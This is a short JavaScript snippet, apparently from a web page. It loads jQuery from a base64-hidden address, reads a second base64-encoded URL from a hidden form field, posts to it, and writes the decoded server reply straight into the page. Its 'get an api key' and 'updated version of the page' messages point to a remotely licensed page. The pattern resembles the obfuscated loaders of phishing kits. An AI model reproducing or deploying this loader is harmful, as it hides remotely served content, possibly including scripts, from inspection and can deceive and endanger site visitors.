var scr= document.createElement('script'); var stc ="aHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuMS4xLm1pbi5qcw==" scr.setAttribute('src',atob(stc)); document.head.append(scr); scr.onload=function(){ $.support.cors = true var url = atob($('#b64u').val()); $.post(url,'scte='.concat('')) .done(function(data){ if(data=='no'){ document.write('

Please Get an api key to use this page

') } else if(data == "outdated"){ document.write('

Please get an updated version of the page

') } else{ try{ document.write(atob(data)); }catch(e){ document.write('

Cannot write to page

') } } }) .fail(function(cd,pg){ document.write("

Unable to connect , Server not found

") }) }